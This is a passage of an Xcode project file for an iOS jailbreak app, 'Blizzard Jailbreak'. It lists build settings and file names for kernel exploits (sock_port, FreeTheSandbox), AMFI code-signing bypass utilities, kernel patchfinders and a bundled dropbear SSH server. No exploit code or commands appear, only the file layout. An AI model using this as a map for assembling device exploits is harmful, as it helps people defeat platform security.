liboffsetfinder64.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = liboffsetfinder64.hpp; sourceTree = \"\"; };\n\t\tD613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = liboffsetfinder64.a; path = \"../electra1131-master/electra1131/libs/liboffsetfinder64.a\"; sourceTree = \"\"; };\n\t\tD613B72B24E2A7B70069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libplist.a; path = \"../electra1131-master/electra1131/libs/libplist.a\"; sourceTree = \"\"; };\n\t\tD613B72C24E2A7B70069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = \"libplist++.a\"; path = \"../electra1131-master/electra1131/libs/libplist++.a\"; sourceTree = \"\"; };\n\t\tD613B72D24E2A7B70069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmerged.a; path = \"../electra1131-master/electra1131/libs/libmerged.a\"; sourceTree = \"\"; };\n\t\tD613B72E24E2A7B70069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libimg4tool.a; path = \"../electra1131-master/electra1131/libs/libimg4tool.a\"; sourceTree = \"\"; };\n\t\tD613B73424E2A8AB0069CA9B /* snapshot_tools.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = snapshot_tools.c; sourceTree = \"\"; };\n\t\tD613B73624E2A8B00069CA9B /* snapshot_tools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = snapshot_tools.h; sourceTree = \"\"; };\n\t\tD613B73724E2A8C40069CA9B /* IOKit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKit.h; sourceTree = \"\"; };\n\t\tD613B73824E2A99B0069CA9B /* system_reboot.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = system_reboot.h; sourceTree = \"\"; };\n\t\tD613B73B24E2B1530069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liboffsetfinder64.a; sourceTree = \"\"; };\n\t\tD613B73C24E2B1530069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libplist.a; sourceTree = \"\"; };\n\t\tD613B73D24E2B1530069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = \"libplist++.a\"; sourceTree = \"\"; };\n\t\tD613B73E24E2B1530069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmerged.a; sourceTree = \"\"; };\n\t\tD613B73F24E2B1540069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libimg4tool.a; sourceTree = \"\"; };\n\t\tD613B74A24E2B2560069CA9B /* libcompression.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = libcompression.tbd; path = usr/lib/libcompression.tbd; sourceTree = SDKROOT; };\n\t\tD613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = libMobileGestalt.tbd; path = usr/lib/libMobileGestalt.tbd; sourceTree = SDKROOT; };\n\t\tD613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = BlizzardSpawnerTools.c; sourceTree = \"\"; };\n\t\tD613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardSpawnerTools.h; sourceTree = \"\"; };\n\t\tD613B75124E2E82F0069CA9B /* amfid_tools.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_tools.h; sourceTree = \"\"; };\n\t\tD613B75224E2E8300069CA9B /* amfi_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfi_utils.h; sourceTree = \"\"; };\n\t\tD613B75324E2E8300069CA9B /* amfi_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfi_utils.m; sourceTree = \"\"; };\n\t\tD613B75424E2E8300069CA9B /* amfid_tools.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_tools.m; sourceTree = \"\"; };\n\t\tD613B75524E2E8300069CA9B /* amfid_mem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_mem.h; sourceTree = \"\"; };\n\t\tD613B75624E2E8300069CA9B /* amfid_mem.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_mem.m; sourceTree = \"\"; };\n\t\tD613B75A24E2E8580069CA9B /* amfid.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid.h; sourceTree = \"\"; };\n\t\tD613B75B24E2E8580069CA9B /* amfid.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid.m; sourceTree = \"\"; };\n\t\tD613B75D24E2E8690069CA9B /* cs_blob.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = cs_blob.h; sourceTree = \"\"; };\n\t\tD613B75E24E2EEFD0069CA9B /* osobject.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = osobject.c; sourceTree = \"\"; };\n\t\tD613B75F24E2EEFD0069CA9B /* osobject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = osobject.h; sourceTree = \"\"; };\n\t\tD613B76424E2F2D30069CA9B /* kernSymbolication.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernSymbolication.c; sourceTree = \"\"; };\n\t\tD613B76524E2F2D30069CA9B /* kernSymbolication.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernSymbolication.h; sourceTree = \"\"; };\n\t\tD613B78024E2F9980069CA9B /* lzssdec.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = \"\"; };\n\t\tD613B78124E2F9980069CA9B /* lzssdec.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = lzssdec.hpp; sourceTree = \"\"; };\n\t\tD62BC51D24E4113200EC63D4 /* tar */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.executable\"; path = tar; sourceTree = \"\"; };\n\t\tD62BC51F24E41AF500EC63D4 /* basebins.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = basebins.tar; sourceTree = \"\"; };\n\t\tD62BC52124E41F2500EC63D4 /* dropbear.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = dropbear.tar; sourceTree = \"\"; };\n\t\tD62CA1E324E1C7EA002E6756 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = \"\"; };\n\t\tD62CA1E424E1C7EA002E6756 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = \"\"; };\n\t\tD62CA1E624E1C7F7002E6756 /* kexecute.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kexecute.c; sourceTree = \"\"; };\n\t\tD62CA1E724E1C7F7002E6756 /* kexecute.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kexecute.h; sourceTree = \"\"; };\n\t\tD62CA1E924E1C7FF002E6756 /* kernel_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_utils.h; sourceTree = \"\"; };\n\t\tD62CA1EA24E1C7FF002E6756 /* kernel_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel_utils.m; sourceTree = \"\"; };\n\t\tD62CA1EC24E1C83E002E6756 /* offsetof.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsetof.c; sourceTree = \"\"; };\n\t\tD62CA1ED24E1C83E002E6756 /* offsetof.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsetof.h; sourceTree = \"\"; };\n\t\tD62CA20A24E1D95F002E6756 /* kerneldec */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.executable\"; name = kerneldec; path = \"../jelbrekLib-master/kerneldec/kerneldec\"; sourceTree = \"\"; };\n\t\tD63EDABF24E1989F009B305D /* blizzardJailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardJailbreak.m; sourceTree = \"\"; };\n\t\tD63EDAC024E1989F009B305D /* blizzardJailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardJailbreak.h; sourceTree = \"\"; };\n\t\tD69C4C96256865BF001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = ../ToolChain/IOKit.tbd; sourceTree = \"\"; };\n\t\tD69C4C9825686627001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = \"../ToolChain/Jailbreak Frameworks/IOKit.tbd\"; sourceTree = \"\"; };\n\t\tD69C4C9D256866A2001DE2BC /* OSMessageNotification.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = OSMessageNotification.h; path = include/IOKit/OSMessageNotification.h; sourceTree = \"\"; };\n\t\tD69C4CA225686884001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc.h; sourceTree = \"\"; };\n\t\tD69C4CA325686884001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = \"\"; };\n\t\tD69C4CA425686894001DE2BC /* ios13_userspace_pac.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace_pac.c; sourceTree = \"\"; };\n\t\tD69C4CA525686894001DE2BC /* ios13_kernel_universal.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_kernel_universal.c; sourceTree = \"\"; };\n\t\tD69C4CA625686894001DE2BC /* ios13_userspace.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace.c; sourceTree = \"\"; };\n\t\tD69C4CA725686894001DE2BC /* ios13_change_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios13_change_offsets.m; sourceTree = \"\"; };\n\t\tD69C4CA825686894001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = xpc.h; path = \"../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/xpc.h\"; sourceTree = \"\"; };\n\t\tD69C4CA925686894001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = \"\"; };\n\t\tD69C4CAA25686895001DE2BC /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = libsnappy.c; sourceTree = \"\"; };\n\t\tD69C4CAB25686895001DE2BC /* ios_7st_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios_7st_utils.m; sourceTree = \"\"; };\n\t\tD69C4CAC25686895001DE2BC /* libsnappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libsnappy.h; sourceTree = \"\"; };\n\t\tD69C4CAD25686895001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = vnode.h; path = \"../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/vnode.h\"; sourceTree = \"\"; };\n\t\tD69C4CB5256868BB001DE2BC /* IOReturn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOReturn.h; sourceTree = \"\"; };\n\t\tD69C4CB6256868BB001DE2BC /* IOKitKeys.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitKeys.h; sourceTree = \"\"; };\n\t\tD69C4CB7256868BB001DE2BC /* IOKitLib.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = \"\"; };\n\t\tD69C4CB8256868BB001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = \"\"; };\n\t\tD69C4CBB25686D0F001DE2BC /* freethesandbox.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = freethesandbox.h; sourceTree = \"\"; };\n\t\tD6FFA56024E1A59A00CAC2E2 /* blizzardView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardView.h; sourceTree = \"\"; };\n\t\tD6FFA56124E1A59A00CAC2E2 /* blizzardView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardView.m; sourceTree = \"\"; };\n/* End PBXFileReference section */\n\n/* Begin PBXFrameworksBuildPhase section */\n\t\t82F179E922DF4ED700231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\tD69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */,\n\t\t\t\tD613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */,\n\t\t\t\tD613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */,\n\t\t\t\tD613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */,\n\t\t\t\tD613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */,\n\t\t\t\tD613B74824E2B1E70069CA9B /* libplist.a in Frameworks */,\n\t\t\t\tD613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */,\n\t\t\t\tD613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0122DF4ED800231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0C22DF4ED800231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXFrameworksBuildPhase section */\n\n/* Begin PBXGroup section */\n\t\t82F179E322DF4ED700231F8C = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C9525686579001DE2BC /* Exploits */,\n\t\t\t\tD62BC51C24E4112300EC63D4 /* Base Binaries */,\n\t\t\t\tD613B73A24E2B13E0069CA9B /* Helper Libraries */,\n\t\t\t\tD613B71D24E2A68D0069CA9B /* APFS Utilities */,\n\t\t\t\tD613B71C24E2A6690069CA9B /* AMFI Utilities */,\n\t\t\t\tD62CA1DF24E1C6FB002E6756 /* Kernel Utilities */,\n\t\t\t\tD62CA1DB24E1C660002E6756 /* PatchFinder */,\n\t\t\t\tD6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */,\n\t\t\t\t82F17A0722DF4ED800231F8C /* sock_port_tests */,\n\t\t\t\t82F17A1222DF4ED800231F8C /* sock_port_UITests */,\n\t\t\t\t82F179ED22DF4ED700231F8C /* Products */,\n\t\t\t\t82F17A2722DF57B700231F8C /* Frameworks */,\n\t\t\t);\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F179ED22DF4ED700231F8C /* Products */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */,\n\t\t\t\t82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */,\n\t\t\t\t82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */,\n\t\t\t);\n\t\t\tname = Products;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F179EE22DF4ED700231F8C /* sock_port */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C9D256866A2001DE2BC /* OSMessageNotification.h */,\n\t\t\t\t82F17A2122DF4EF100231F8C /* exploit.c */,\n\t\t\t\t82F17A2222DF4EF100231F8C /* exploit.h */,\n\t\t\t\t82F17A2422DF4F1C00231F8C /* exploit_utilities.c */,\n\t\t\t\t82F17A2522DF4F1C00231F8C /* exploit_utilities.h */,\n\t\t\t\t8288501022E07303005D10FC /* kernel_memory.c */,\n\t\t\t\t8288501122E07303005D10FC /* kernel_memory.h */,\n\t\t\t\t8288501422E07C14005D10FC /* offsets.h */,\n\t\t\t\t8288501322E07C14005D10FC /* offsets.m */,\n\t\t\t\tD62CA1EC24E1C83E002E6756 /* offsetof.c */,\n\t\t\t\tD62CA1ED24E1C83E002E6756 /* offsetof.h */,\n\t\t\t\t82E9B71422E24BAD0016AA39 /* iosurface.c */,\n\t\t\t\t82E9B71322E24BAC0016AA39 /* iosurface.h */,\n\t\t\t);\n\t\t\tpath = sock_port;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F17A0722DF4ED800231F8C /* sock_port_tests */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F17A0822DF4ED800231F8C /* socket_freeTests.m */,\n\t\t\t\t82F17A0A22DF4ED800231F8C /* Info.plist */,\n\t\t\t);\n\t\t\tpath = sock_port_tests;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F17A1222DF4ED800231F8C /* sock_port_UITests */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F17A1322DF4ED800231F8C /* socket_freeUITests.m */,\n\t\t\t\t82F17A1522DF4ED800231F8C /* Info.plist */,\n\t\t\t);\n\t\t\tpath = sock_port_UITests;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F17A2722DF57B700231F8C /* Frameworks */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C96256865BF001DE2BC /* IOKit.tbd */,\n\t\t\t\tD69C4C9825686627001DE2BC /* IOKit.tbd */,\n\t\t\t\tD613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */,\n\t\t\t\tD613B74A24E2B2560069CA9B /* libcompression.tbd */,\n\t\t\t\tD613B72E24E2A7B70069CA9B /* libimg4tool.a */,\n\t\t\t\tD613B72D24E2A7B70069CA9B /* libmerged.a */,\n\t\t\t\tD613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */,\n\t\t\t\tD613B72B24E2A7B70069CA9B /* libplist.a */,\n\t\t\t\tD613B72C24E2A7B70069CA9B /* libplist++.a */,\n\t\t\t\tD62CA20A24E1D95F002E6756 /* kerneldec */,\n\t\t\t\t82F17A2822DF57B700231F8C /* IOKit.tbd */,\n\t\t\t);\n\t\t\tname = Frameworks;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD613B71C24E2A6690069CA9B /* AMFI Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B75E24E2EEFD0069CA9B /* osobject.c */,\n\t\t\t\tD613B75F24E2EEFD0069CA9B /* osobject.h */,\n\t\t\t\tD613B75D24E2E8690069CA9B /* cs_blob.h */,\n\t\t\t\tD613B75224E2E8300069CA9B /* amfi_utils.h */,\n\t\t\t\tD613B75324E2E8300069CA9B /* amfi_utils.m */,\n\t\t\t\tD613B75524E2E8300069CA9B /* amfid_mem.h */,\n\t\t\t\tD613B75624E2E8300069CA9B /* amfid_mem.m */,\n\t\t\t\tD613B75124E2E82F0069CA9B /* amfid_tools.h */,\n\t\t\t\tD613B75424E2E8300069CA9B /* amfid_tools.m */,\n\t\t\t\tD613B75A24E2E8580069CA9B /* amfid.h */,\n\t\t\t\tD613B75B24E2E8580069CA9B /* amfid.m */,\n\t\t\t);\n\t\t\tpath = \"AMFI Utilities\";\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD613B71D24E2A68D0069CA9B /* APFS Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73724E2A8C40069CA9B /* IOKit.h */,\n\t\t\t\tD613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */,\n\t\t\t\tD613B72624E2A76A0069CA9B /* offsetfinder.cpp */,\n\t\t\t\tD613B72424E2A76A0069CA9B /* rootfs_remount.m */,\n\t\t\t\tD613B72524E2A76A0069CA9B /* rootfs_remount.h */,\n\t\t\t\tD613B73624E2A8B00069CA9B /* snapshot_tools.h */,\n\t\t\t\tD613B73424E2A8AB0069CA9B /* snapshot_tools.c */,\n\t\t\t);\n\t\t\tpath = \"APFS Utilities\";\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD613B73A24E2B13E0069CA9B /* Helper Libraries */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73F24E2B1540069CA9B /* libimg4tool.a */,\n\t\t\t\tD613B73E24E2B1530069CA9B /* libmerged.a */,\n\t\t\t\tD613B73B24E2B1530069CA9B /* liboffsetfinder64.a */,\n\t\t\t\tD613B73C24E2B1530069CA9B /* libplist.a */,\n\t\t\t\tD613B73D24E2B1530069CA9B /* libplist++.a */,\n\t\t\t);\n\t\t\tpath = \"Helper Libraries\";\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD62BC51C24E4112300EC63D4 /* Base Binaries */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD62BC51F24E41AF500EC63D4 /* basebins.tar */,\n\t\t\t\tD62BC52124E41F2500EC63D4 /* dropbear.tar */,\n\t\t\t\tD62BC51D24E4113200EC63D4 /* tar */,\n\t\t\t);\n\t\t\tpath = \"Base Binaries\";\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD62CA1DB24E1C660002E6756 /* PatchFinder */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD62CA1E324E1C7EA002E6756 /* patchfinder64.h */,\n\t\t\t\tD62CA1E424E1C7EA002E6756 /* patchfinder64.m */,\n\t\t\t);\n\t\t\tpath = PatchFinder;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD62CA1DF24E1C6FB002E6756 /* Kernel Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73824E2A99B0069CA9B /* system_reboot.h */,\n\t\t\t\tD62CA1E924E1C7FF002E6756 /* kernel_utils.h */,\n\t\t\t\tD62CA1EA24E1C7FF002E6756 /* kernel_utils.m */,\n\t\t\t\tD62CA1E624E1C7F7002E6756 /* kexecute.c */,\n\t\t\t\tD62CA1E724E1C7F7002E6756 /* kexecute.h */,\n\t\t\t\tD613B76424E2F2D30069CA9B /* kernSymbolication.c */,\n\t\t\t\tD613B76524E2F2D30069CA9B /* kernSymbolication.h */,\n\t\t\t\tD613B78124E2F9980069CA9B /* lzssdec.hpp */,\n\t\t\t\tD613B78024E2F9980069CA9B /* lzssdec.cpp */,\n\t\t\t);\n\t\t\tpath = \"Kernel Utilities\";\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD69C4C9525686579001DE2BC /* Exploits */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CB4256868A8001DE2BC /* IOKit */,\n\t\t\t\tD69C4CA125686866001DE2BC /* FreeTheSandbox */,\n\t\t\t\t82F179EE22DF4ED700231F8C /* sock_port */,\n\t\t\t);\n\t\t\tpath = Exploits;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD69C4CA125686866001DE2BC /* FreeTheSandbox */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CAB25686895001DE2BC /* ios_7st_utils.m */,\n\t\t\t\tD69C4CA725686894001DE2BC /* ios13_change_offsets.m */,\n\t\t\t\tD69C4CA525686894001DE2BC /* ios13_kernel_universal.c */,\n\t\t\t\tD69C4CA425686894001DE2BC /* ios13_userspace_pac.c */,\n\t\t\t\tD69C4CA625686894001DE2BC /* ios13_userspace.c */,\n\t\t\t\tD69C4CBB25686D0F001DE2BC /* freethesandbox.h */,\n\t\t\t\tD69C4CA925686894001DE2BC /* IOTypes.h */,\n\t\t\t\tD69C4CAA25686895001DE2BC /* libsnappy.c */,\n\t\t\t\tD69C4CAC25686895001DE2BC /* libsnappy.h */,\n\t\t\t\tD69C4CAD25686895001DE2BC /* vnode.h */,\n\t\t\t\tD69C4CA825686894001DE2BC /* xpc.h */,\n\t\t\t\tD69C4CA325686884001DE2BC /* vnode.h */,\n\t\t\t\tD69C4CA225686884001DE2BC /* xpc.h */,\n\t\t\t);\n\t\t\tpath = FreeTheSandbox;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD69C4CB4256868A8001DE2BC /* IOKit */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CB6256868BB001DE2BC /* IOKitKeys.h */,\n\t\t\t\tD69C4CB7256868BB001DE2BC /* IOKitLib.h */,\n\t\t\t\tD69C4CB5256868BB001DE2BC /* IOReturn.h */,\n\t\t\t\tD69C4CB8256868BB001DE2BC /* IOTypes.h */,\n\t\t\t);\n\t\t\tpath = IOKit;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\tD6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179FD22DF4ED700231F8C /* Info.plist */,\n\t\t\t\t82F179EF22DF4ED700231F8C /* AppDelegate.h */,\n\t\t\t\t82F179F022DF4ED700231F8C /* AppDelegate.m */,\n\t\t\t\t82F179F822DF4ED700231F8C /* Assets.xcassets */,\n\t\t\t\t82F179FE22DF4ED700231F8C /* main.m */,\n\t\t\t\t82F179F522DF4ED700231F8C /* Main.storyboard */,\n\t\t\t\t82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */,\n\t\t\t\tD63EDAC024E1989F009B305D /* blizzardJailbreak.h */,\n\t\t\t\tD63EDABF24E1989F009B305D /* blizzardJailbreak.m */,\n\t\t\t\tD6FFA56024E1A59A00CAC2E2 /* blizzardView.h */,\n\t\t\t\tD6FFA56124E1A59A00CAC2E2 /* blizzardView.m */,\n\t\t\t\tD613B71924E217D90069CA9B /* BlizzardLog.h */,\n\t\t\t\tD613B71A24E217D90069CA9B /* BlizzardLog.m */,\n\t\t\t\tD613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */,\n\t\t\t\tD613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */,\n\t\t\t);\n\t\t\tpath = \"Blizzard Jailbreak\";\n\t\t\tsourceTree = \"\";\n\t\t};\n/* End PBXGroup section */\n\n/* Begin PBXNativeTarget section */\n\t\t82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard Jailbreak\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F179E822DF4ED700231F8C /* Sources */,\n\t\t\t\t82F179E922DF4ED700231F8C /* Frameworks */,\n\t\t\t\t82F179EA22DF4ED700231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t);\n\t\t\tname = \"Blizzard Jailbreak\";\n\t\t\tproductName = socket_free;\n\t\t\tproductReference = 82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */;\n\t\t\tproductType = \"com.apple.product-type.application\";\n\t\t};\n\t\t82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakTests\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F17A0022DF4ED800231F8C /* Sources */,\n\t\t\t\t82F17A0122DF4ED800231F8C /* Frameworks */,\n\t\t\t\t82F17A0222DF4ED800231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t\t82F17A0622DF4ED800231F8C /* PBXTargetDependency */,\n\t\t\t);\n\t\t\tname = \"Blizzard JailbreakTests\";\n\t\t\tproductName = socket_freeTests;\n\t\t\tproductReference = 82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */;\n\t\t\tproductType = 